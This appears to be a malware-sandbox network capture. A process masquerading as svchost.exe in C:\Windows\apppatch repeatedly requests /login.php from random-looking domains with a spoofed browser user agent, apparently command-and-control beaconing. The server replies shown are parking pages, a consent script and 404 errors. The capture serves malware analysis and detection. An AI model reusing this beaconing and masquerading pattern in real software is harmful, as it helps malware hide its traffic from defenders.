                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 61 39 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74
                                                                                                                                                                                                            Data Ascii: a9ae<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990035057 CET146INData Raw: 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69 65 73
                                                                                                                                                                                                            Data Ascii: >window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_i
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990046024 CET1236INData Raw: 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77
                                                                                                                                                                                                            Data Ascii: d" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cm
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990080118 CET1236INData Raw: 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 3f
                                                                                                                                                                                                            Data Ascii: var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990092039 CET424INData Raw: 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72 28 64 2e 68 61 73 68 2e 69 6e
                                                                                                                                                                                                            Data Ascii: ;var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&")
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990135908 CET1236INData Raw: 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 76 61 72 20 63 3d 78 28 22 63 6d 70 64 65 73 69 67 6e 22 2c 22 63 6d 70 5f 64 65 73 69 67 6e 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 64 65 73 69 67 6e 3a 22 22 29
                                                                                                                                                                                                            Data Ascii: ttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x("cmpgppkey","cmp_gppkey" in h?h.cmp_gppkey:"");var n=x("cmpatt","cmp_att" in
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990153074 CET1236INData Raw: 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 3a 22 22 29 3b 69 66 28 61 3d 3d 22 31 22 29 7b 6d 3d 22 69 6e 73 74 72 75 6d 65 6e 74 65 64 22
                                                                                                                                                                                                            Data Ascii: rage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=t
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990164042 CET226INData Raw: 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 21 3d 2d 31 29 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29
                                                                                                                                                                                                            Data Ascii: xOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};wi
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990231037 CET1236INData Raw: 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                            Data Ascii: ndow.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990242958 CET1236INData Raw: 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64
                                                                                                                                                                                                            Data Ascii: }}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_pin
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995042086 CET1236INData Raw: 5f 74 63 66 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53
                                                                                                                                                                                                            Data Ascii: _tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppRetu


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.956874199.59.243.227807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464807034 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.907919884 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:22:38 GMT; path=/
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908217907 CET528INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0ODU4LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.95687523.253.46.64807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540798903 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016473055 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:33 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016578913 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.95688385.17.31.82807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.506505966 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.956884154.212.231.82807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.512661934 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.393816948 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.410044909 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.766338110 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.932549000 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.292812109 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.504043102 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.874531984 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
